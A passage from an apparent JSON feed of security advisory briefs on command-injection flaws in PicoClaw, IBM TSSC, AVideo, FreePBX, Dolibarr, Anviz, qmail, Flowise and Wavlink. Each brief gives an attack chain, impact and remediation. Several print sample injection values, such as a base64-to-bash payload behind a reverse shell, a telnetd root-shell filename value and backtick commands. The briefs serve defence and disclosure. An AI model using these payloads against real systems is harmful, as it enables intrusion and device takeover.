neutralization of special elements in the input to the \u003ccode\u003e/api/gateway/restart\u003c/code\u003e function. The project maintainers were notified through an issue report, but as of the time of disclosure, no response or patch has been released. This vulnerability poses a significant risk, potentially leading to full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable PicoClaw instance running version 0.2.4.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/api/gateway/restart\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eWithin the request, the attacker injects OS commands into a parameter processed by the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe PicoClaw application fails to properly sanitize the attacker-supplied input.\u003c/li\u003e\n\u003cli\u003eThe application executes the injected commands with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the initial foothold to escalate privileges, potentially gaining root access.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware, exfiltrates sensitive data, or performs other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this command injection vulnerability allows a remote attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data theft, or denial of service. Given the nature of command injection, the attacker may be able to escalate privileges and gain full control over the server. The number of potential victims is unknown, but any PicoClaw installation running version 0.2.4 exposed to the network is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches for PicoClaw as soon as they are released to remediate CVE-2026-6987.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the \u003ccode\u003e/api/gateway/restart\u003c/code\u003e endpoint to prevent command injection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious PicoClaw Restart Requests\u003c/code\u003e to monitor for exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual activity or suspicious commands executed via HTTP requests, correlating with requests to \u003ccode\u003e/api/gateway/restart\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eConsider using a web application firewall (WAF) to filter malicious requests targeting the \u003ccode\u003e/api/gateway/restart\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-25T17:16:33Z","date_published":"2026-04-25T17:16:33Z","id":"/briefs/2026-04-picoclaw-cmd-injection/","summary":"PicoClaw version 0.2.4 is vulnerable to command injection via the /api/gateway/restart endpoint of the Web Launcher Management Plane, allowing a remote attacker to execute arbitrary commands by manipulating input.","title":"PicoClaw Web Launcher Management Plane Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-picoclaw-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-5935"}],"_cs_exploited":false,"_cs_products":["Total Storage Service Console","TS4500 IMC"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-5935","rce","command injection"],"_cs_type":"advisory","_cs_vendors":["IBM"],"content_html":"\u003cp\u003eCVE-2026-5935 describes a critical vulnerability affecting IBM Total Storage Service Console (TSSC) / TS4500 IMC software. Specifically, versions 9.2, 9.3, 9.4, 9.5, and 9.6 are susceptible to unauthenticated remote command execution. The vulnerability stems from insufficient validation of user-supplied input, allowing an attacker to inject and execute arbitrary commands on the system. Successful exploitation grants the attacker normal user privileges. This vulnerability poses a significant risk as it allows attackers to compromise the system without authentication, potentially leading to data breaches, system disruption, or further lateral movement within the network. Defenders should prioritize patching or mitigating this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker identifies a vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC instance running versions 9.2, 9.3, 9.4, 9.5, or 9.6.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request containing an OS command injection payload. This payload is designed to exploit the improper input validation within the TSSC/IMC software.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted request to the vulnerable TSSC/IMC instance, targeting a specific endpoint or function susceptible to command injection.\u003c/li\u003e\n\u003cli\u003eThe TSSC/IMC software processes the request without proper validation, passing the malicious payload to the underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe operating system executes the injected command with the privileges of a normal user account.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to execute arbitrary commands on the system, potentially allowing them to read sensitive files, modify configurations, or install malicious software.\u003c/li\u003e\n\u003cli\u003eThe attacker may leverage their initial access to escalate privileges, move laterally within the network, or establish persistent access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5935 allows an unauthenticated attacker to execute arbitrary commands on the affected IBM Total Storage Service Console (TSSC) / TS4500 IMC system. This can lead to complete system compromise, data breaches, and disruption of services. The impact could range from unauthorized access to sensitive data to the deployment of ransomware, depending on the attacker\u0026rsquo;s objectives and the level of access achieved after exploitation. Due to the lack of authentication requirement, the vulnerability is highly critical.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patch or upgrade to a fixed version of IBM Total Storage Service Console (TSSC) / TS4500 IMC as outlined in the IBM advisory (\u003ca href=\"https://www.ibm.com/support/pages/node/7270127\"\u003ehttps://www.ibm.com/support/pages/node/7270127\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect command execution via web requests targeting TSSC/IMC.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the blast radius of a potential compromise of the TSSC/IMC system.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T00:16:46Z","date_published":"2026-04-23T00:16:46Z","id":"/briefs/2026-04-ibm-tssc-rce/","summary":"An unauthenticated user can execute arbitrary commands with normal user privileges on vulnerable IBM Total Storage Service Console (TSSC) / TS4500 IMC versions due to improper validation of user-supplied input, as identified by CVE-2026-5935.","title":"IBM Total Storage Service Console (TSSC) / TS4500 IMC Unauthenticated Remote Command Execution","url":"https://feed.craftedsignal.io/briefs/2026-04-ibm-tssc-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.3,"id":"CVE-2026-41064"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-41064","avideo","rce","command-injection"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eWWBN AVideo, an open-source video platform, is vulnerable to an unauthenticated remote code execution (RCE) flaw. This vulnerability, identified as CVE-2026-41064, exists in versions up to and including 29.0. The root cause is an incomplete fix applied to the \u003ccode\u003etest.php\u003c/code\u003e file. While the fix implemented \u003ccode\u003eescapeshellarg\u003c/code\u003e for the \u003ccode\u003ewget\u003c/code\u003e command, it neglected to sanitize input for the \u003ccode\u003efile_get_contents\u003c/code\u003e and \u003ccode\u003ecurl\u003c/code\u003e code paths. Additionally, the URL validation regex \u003ccode\u003e/^http/\u003c/code\u003e is overly permissive, accepting malicious strings such as \u003ccode\u003ehttpevil[.]com\u003c/code\u003e. Successful exploitation allows attackers to execute arbitrary commands on the server hosting the AVideo platform. The recommended remediation is to apply the updated fix detailed in commit 78bccae74634ead68aa6528d631c9ec4fd7aa536.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker sends a crafted HTTP request to the \u003ccode\u003etest.php\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes a malicious URL, designed to exploit the insufficient input validation in the \u003ccode\u003efile_get_contents\u003c/code\u003e or \u003ccode\u003ecurl\u003c/code\u003e code paths. For example, using \u003ccode\u003ehttpevil[.]com\u003c/code\u003e to bypass the regex check \u003ccode\u003e/^http/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003etest.php\u003c/code\u003e script processes the request, attempting to retrieve content from the attacker-controlled URL using either \u003ccode\u003efile_get_contents\u003c/code\u003e or \u003ccode\u003ecurl\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDue to the lack of proper sanitization, the malicious URL is interpreted as an OS command.\u003c/li\u003e\n\u003cli\u003eThe server executes the attacker-supplied OS command.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the AVideo server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform various malicious activities, such as installing malware, stealing sensitive data, or pivoting to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-41064) grants unauthenticated attackers the ability to execute arbitrary code on the affected AVideo server. This can lead to complete compromise of the server, including data theft, defacement, or use as a staging ground for further attacks. Given the platform\u0026rsquo;s use in video hosting, successful attacks could impact numerous users and content creators relying on the vulnerable AVideo instance. The vulnerable regex \u003ccode\u003e/^http/\u003c/code\u003e and unsanitized functions leave the server open to mass exploitation if exposed to the public internet.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the updated fix detailed in commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 to fully address the input validation issue in \u003ccode\u003etest.php\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect AVideo test.php Command Injection Attempt\u0026rdquo; to detect exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003etest.php\u003c/code\u003e containing suspicious URLs, especially those matching the \u003ccode\u003ehttpevil[.]com\u003c/code\u003e pattern as documented in the IOCs.\u003c/li\u003e\n\u003cli\u003eImplement a more robust URL validation mechanism that properly sanitizes input before passing it to \u003ccode\u003efile_get_contents\u003c/code\u003e or \u003ccode\u003ecurl\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T00:16:28Z","date_published":"2026-04-22T00:16:28Z","id":"/briefs/2026-04-avideo-rce/","summary":"WWBN AVideo versions up to 29.0 contain an OS Command Injection vulnerability (CVE-2026-41064) in the `test.php` file, allowing unauthenticated remote code execution due to insufficient input sanitization, especially affecting `file_get_contents` and `curl` code paths.","title":"WWBN AVideo Unauthenticated Remote Code Execution via test.php","url":"https://feed.craftedsignal.io/briefs/2026-04-avideo-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-40520"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","freepbx","graphql","cve-2026-40520"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFreePBX, a widely used open-source PBX (Private Branch Exchange) system, is vulnerable to a command injection flaw within its API module. Specifically, versions 17.0.8 and earlier are affected by CVE-2026-40520. The vulnerability resides in the \u003ccode\u003einitiateGqlAPIProcess()\u003c/code\u003e function, where GraphQL mutation input fields are directly passed to the \u003ccode\u003eshell_exec()\u003c/code\u003e function without proper sanitization or escaping. This allows an authenticated attacker with a valid bearer token to inject and execute arbitrary commands on the underlying host operating system as the web server user. The attack vector involves sending a specially crafted GraphQL \u003ccode\u003emoduleOperations\u003c/code\u003e mutation containing backtick-wrapped commands within the \u003ccode\u003emodule\u003c/code\u003e field. Successful exploitation grants the attacker the ability to compromise the FreePBX server and potentially pivot to other internal systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker authenticates to the FreePBX API using a valid bearer token.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a GraphQL \u003ccode\u003emoduleOperations\u003c/code\u003e mutation request.\u003c/li\u003e\n\u003cli\u003eWithin the \u003ccode\u003emodule\u003c/code\u003e field of the mutation, the attacker injects a command using backticks (e.g., \u003ccode\u003e\\\u003c/code\u003eid` `).\u003c/li\u003e\n\u003cli\u003eThe attacker sends the malicious GraphQL request to the \u003ccode\u003e/api\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003einitiateGqlAPIProcess()\u003c/code\u003e function processes the request without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected command is passed to the \u003ccode\u003eshell_exec()\u003c/code\u003e function within \u003ccode\u003eApi.class.php\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eshell_exec()\u003c/code\u003e function executes the injected command on the FreePBX server as the web server user (e.g., \u003ccode\u003ewww-data\u003c/code\u003e, \u003ccode\u003eapache\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary command execution on the server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this command injection vulnerability (CVE-2026-40520) allows an attacker to execute arbitrary commands on the FreePBX server with the privileges of the web server user. This can lead to complete compromise of the PBX system, allowing the attacker to eavesdrop on calls, modify call routing, steal sensitive data, install malware, and potentially pivot to other systems on the network. Given the critical role of PBX systems in business communications, a successful attack can disrupt operations, damage reputation, and result in significant financial losses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the FreePBX API module to a version greater than 17.0.8 to patch CVE-2026-40520.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FreePBX GraphQL Command Injection\u003c/code\u003e to identify exploitation attempts by detecting backticks in GraphQL mutation requests.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to the \u003ccode\u003e/api\u003c/code\u003e endpoint containing GraphQL mutations with backtick-wrapped commands to detect command injection attempts.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures for all GraphQL input fields to prevent command injection vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T13:16:20Z","date_published":"2026-04-21T13:16:20Z","id":"/briefs/2026-04-freepbx-command-injection/","summary":"FreePBX api module version 17.0.8 and prior contain a command injection vulnerability in the initiateGqlAPIProcess() function, allowing authenticated users to execute arbitrary commands via crafted GraphQL mutations.","title":"FreePBX API Module Command Injection Vulnerability (CVE-2026-40520)","url":"https://feed.craftedsignal.io/briefs/2026-04-freepbx-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-23500"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","dolibarr"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDolibarr, a popular open-source ERP and CRM system, is susceptible to OS Command Injection (RCE) in versions up to 22.0.4. This vulnerability, identified as CVE-2026-23500, stems from insufficient validation of the \u003ccode\u003eMAIN_ODT_AS_PDF\u003c/code\u003e configuration setting. An attacker with administrative privileges can inject malicious commands into this setting, which are then executed by the server during ODT to PDF conversion processes. The vulnerability resides in \u003ccode\u003ehtdocs/includes/odtphp/odf.php\u003c/code\u003e, where the application constructs a shell command using the unfiltered \u003ccode\u003eMAIN_ODT_AS_PDF\u003c/code\u003e value. Successful exploitation enables arbitrary command execution on the server, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains administrative access to the Dolibarr instance, either through credential compromise or social engineering.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the \u0026ldquo;Home -\u0026gt; Setup -\u0026gt; Other Setup\u0026rdquo; section of the Dolibarr administration panel.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the \u003ccode\u003eMAIN_ODT_AS_PDF\u003c/code\u003e configuration constant. The injected payload includes a command separator (\u003ccode\u003e;\u003c/code\u003e) followed by the malicious command. The example uses \u003ccode\u003ejodconverter; echo \u0026lt;base64_encoded_command\u0026gt; | base64 -d | bash\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker navigates to the \u0026ldquo;Commerce -\u0026gt; New proposal\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new proposal in draft status and selects an ODT template.\u003c/li\u003e\n\u003cli\u003eThe attacker clicks the \u0026ldquo;Generate\u0026rdquo; button, triggering the ODT to PDF conversion process.\u003c/li\u003e\n\u003cli\u003eThe application executes the crafted shell command, resulting in command execution.\u003c/li\u003e\n\u003cli\u003eIn the proof of concept, the attacker establishes a reverse shell connection to their specified IP address (172.26.0.1) and port (4445), gaining interactive shell access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an attacker with administrator privileges to execute arbitrary commands on the underlying server as the web server user. This can lead to the compromise of sensitive data, modification of application files, and potentially full system compromise. The observed impact includes the establishment of a reverse shell, granting the attacker complete control over the Dolibarr instance. This vulnerability affects Dolibarr installations up to version 22.0.4.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Dolibarr to a patched version beyond 22.0.4 to remediate CVE-2026-23500.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for commands executed with suspicious arguments in \u003ccode\u003eMAIN_ODT_AS_PDF\u003c/code\u003e by deploying the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eMonitor network connections to unusual external IP addresses originating from the web server, especially following events related to document generation. Block the C2 IP address \u003ccode\u003e172.26.0.1\u003c/code\u003e listed in the IOC table at the network perimeter.\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and regularly audit administrator accounts to prevent unauthorized access to the Dolibarr configuration settings.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-18T12:00:00Z","date_published":"2026-04-18T12:00:00Z","id":"/briefs/2026-04-dolibarr-rce/","summary":"Dolibarr versions 22.0.4 and earlier are vulnerable to OS Command Injection via the MAIN_ODT_AS_PDF configuration, allowing an authenticated administrator to inject a malicious payload, leading to arbitrary operating system command execution.","title":"Dolibarr OS Command Injection via MAIN_ODT_AS_PDF Configuration","url":"https://feed.craftedsignal.io/briefs/2026-04-dolibarr-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-35682"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","unauthorized-access","iot"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-35682 describes an authenticated command injection vulnerability in Anviz CX2 Lite devices. An attacker with valid user credentials can inject arbitrary commands into the filename parameter, leading to remote code execution with root privileges. The vulnerability allows an attacker to execute commands like starting telnetd, effectively gaining complete control over the device. This poses a significant risk to organizations using vulnerable Anviz CX2 Lite devices for access control or time attendance, potentially leading to unauthorized access, data breaches, or denial-of-service conditions. The ICS-CERT advisory, ICSA-26-106-03, provides additional details.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains valid credentials for an Anviz CX2 Lite device.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the device\u0026rsquo;s web interface or API.\u003c/li\u003e\n\u003cli\u003eThe attacker identifies the vulnerable filename parameter in a specific request.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request containing a command injection payload within the filename parameter (e.g., \u003ccode\u003efilename=;telnetd -p 1337 -l /bin/sh;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe Anviz CX2 Lite device processes the request, improperly sanitizing the filename parameter.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with root privileges on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the executed command to start a service like telnetd.\u003c/li\u003e\n\u003cli\u003eThe attacker connects to the newly started service, gaining a root shell and complete control of the device.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-35682 allows a remote attacker to gain root-level access to the Anviz CX2 Lite device. This can lead to complete system compromise, including unauthorized access to sensitive data, modification of device settings, and potential use of the device as a foothold for further attacks within the network. Given that these devices are often used for physical access control, this vulnerability could lead to unauthorized physical access to secured areas.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or firmware updates from Anviz to remediate CVE-2026-35682. Contact Anviz directly through their website for support and remediation steps (\u003ca href=\"https://www.anviz.com/contact-us.html)\"\u003ehttps://www.anviz.com/contact-us.html)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Anviz CX2 Lite Command Injection Attempt\u003c/code\u003e to identify exploitation attempts against the device.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests containing command injection payloads in the filename parameter to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eReview authentication logs for unauthorized access attempts to the Anviz CX2 Lite devices.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T20:16:35Z","date_published":"2026-04-17T20:16:35Z","id":"/briefs/2026-04-anviz-command-injection/","summary":"Anviz CX2 Lite is vulnerable to an authenticated command injection via the filename parameter, leading to arbitrary command execution and root-level access.","title":"Anviz CX2 Lite Authenticated Command Injection Vulnerability (CVE-2026-35682)","url":"https://feed.craftedsignal.io/briefs/2026-04-anviz-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.1,"id":"CVE-2026-41113"}],"_cs_exploited":true,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["qmail","rce","command-injection","CVE-2026-41113"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eSagredo qmail, a mail transfer agent (MTA), is vulnerable to a remote code execution (RCE) flaw, identified as CVE-2026-41113.  Specifically, versions prior to 2026.04.07 are affected. The vulnerability lies in the \u003ccode\u003enotlshosts_auto\u003c/code\u003e function within the \u003ccode\u003eqmail-remote.c\u003c/code\u003e file, where the \u003ccode\u003epopen\u003c/code\u003e function is used without proper sanitization, potentially allowing an attacker to inject and execute arbitrary OS commands. This vulnerability could be exploited by a remote attacker without requiring authentication, making it a critical security concern for organizations utilizing the affected qmail versions. Defenders should prioritize patching and consider implementing mitigations to prevent potential exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker sends an email to a target qmail server.\u003c/li\u003e\n\u003cli\u003eThe qmail server receives the email and processes the recipient address.\u003c/li\u003e\n\u003cli\u003eDuring the delivery process, \u003ccode\u003eqmail-remote.c\u003c/code\u003e is invoked to handle remote delivery.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003enotlshosts_auto\u003c/code\u003e function is called within \u003ccode\u003eqmail-remote.c\u003c/code\u003e to determine if TLS should be used for the connection.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003enotlshosts_auto\u003c/code\u003e function executes the \u003ccode\u003epopen\u003c/code\u003e command with a crafted input string from the email, attempting to resolve hostnames.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious commands into the hostname string, which are then executed by \u003ccode\u003epopen\u003c/code\u003e on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the qmail server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then pivot to other systems within the network or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-41113 allows a remote attacker to execute arbitrary code on the vulnerable qmail server. This could lead to complete system compromise, data breaches, or denial-of-service conditions. Organizations using vulnerable versions of qmail are at risk of losing control of their email infrastructure and potentially exposing sensitive information. While the number of actively exploited instances is currently unknown, the high CVSS score (8.1) underscores the severity and potential for widespread impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Sagredo qmail version 2026.04.07 or later to patch CVE-2026-41113 (reference: \u003ca href=\"https://github.com/sagredo-dev/qmail/releases/tag/v2026.04.07\"\u003ehttps://github.com/sagredo-dev/qmail/releases/tag/v2026.04.07\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a successful compromise on the qmail server.\u003c/li\u003e\n\u003cli\u003eMonitor qmail server logs for suspicious activity, such as unusual process execution or network connections (enable process_creation and network_connection logging).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious Qmail Remote Execution via popen\u0026rdquo; to identify potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T12:00:00Z","date_published":"2026-04-17T12:00:00Z","id":"/briefs/2026-04-qmail-rce/","summary":"A remote code execution vulnerability exists in Sagredo qmail versions prior to 2026.04.07 due to the use of `popen` in the `notlshosts_auto` function within `qmail-remote.c`, potentially leading to OS command injection.","title":"Sagredo qmail Remote Code Execution Vulnerability (CVE-2026-41113)","url":"https://feed.craftedsignal.io/briefs/2026-04-qmail-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["flowise","rce","command-injection"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFlowise is an open-source low-code platform to build customized AI flow. Versions 3.0.13 and earlier contain a critical vulnerability that allows authenticated users to execute arbitrary commands on the underlying operating system. This vulnerability stems from insufficient input sanitization within the MCP (Model Composition Protocol) adapter. By adding a new MCP using stdio, an attacker can inject malicious commands, bypassing existing sanitization checks. Specifically, the vulnerability lies in the \u0026ldquo;Custom MCP\u0026rdquo; configuration where commands like \u0026ldquo;npx\u0026rdquo; can be combined with code execution arguments (e.g., \u0026ldquo;npx -c touch /tmp/pwn\u0026rdquo;), leading to direct code execution. This vulnerability affects both the \u003ccode\u003eflowise\u003c/code\u003e and \u003ccode\u003eflowise-components\u003c/code\u003e packages.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Flowise application.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Custom MCP configuration page (e.g., \u003ccode\u003e/canvas\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eAttacker creates a new Custom MCP adapter.\u003c/li\u003e\n\u003cli\u003eAttacker configures the MCP adapter to use stdio.\u003c/li\u003e\n\u003cli\u003eAttacker injects a malicious command, such as \u0026ldquo;npx -c touch /tmp/pwn\u0026rdquo;, into the command or arguments fields. This bypasses \u003ccode\u003evalidateCommandInjection\u003c/code\u003e and \u003ccode\u003evalidateArgsForLocalFileAccess\u003c/code\u003e checks.\u003c/li\u003e\n\u003cli\u003eFlowise application executes the attacker-supplied command via the MCP adapter.\u003c/li\u003e\n\u003cli\u003eMalicious command is executed on the underlying operating system.\u003c/li\u003e\n\u003cli\u003eAttacker achieves arbitrary code execution on the server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an authenticated attacker to achieve arbitrary command execution on the Flowise server. This could lead to complete system compromise, data theft, or denial of service. The vulnerability affects Flowise installations running versions 3.0.13 and earlier. The number of affected installations is currently unknown, but given the popularity of Flowise, the potential impact is significant.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Flowise and Flowise-components to a version greater than 3.0.13 to patch CVE-2026-40933.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for the execution of \u0026ldquo;npx\u0026rdquo; with the \u0026ldquo;-c\u0026rdquo; argument where the parent process is the Flowise application. Deploy the provided Sigma rule \u003ccode\u003eDetect Flowise MCP Command Execution\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement stricter input validation and sanitization measures within the MCP adapter configuration to prevent command injection attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T12:00:00Z","date_published":"2026-04-17T12:00:00Z","id":"/briefs/2026-04-flowise-rce/","summary":"Flowise versions 3.0.13 and earlier are vulnerable to authenticated arbitrary command execution due to unsafe serialization of stdio commands in the MCP adapter, allowing a malicious user to execute commands on the underlying operating system.","title":"Flowise Authenticated Remote Code Execution via MCP Adapter","url":"https://feed.craftedsignal.io/briefs/2026-04-flowise-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-6483"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","router","cve-2026-6483"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical OS command injection vulnerability, tracked as CVE-2026-6483, has been identified in Wavlink WL-WN530H4 routers running firmware version 20220721. The flaw resides within the \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e file, specifically affecting the \u003ccode\u003estrcat/snprintf\u003c/code\u003e function. Successful exploitation enables remote attackers to execute arbitrary OS commands on the affected device.  The vulnerability is triggered by manipulating input to the vulnerable function. A public exploit 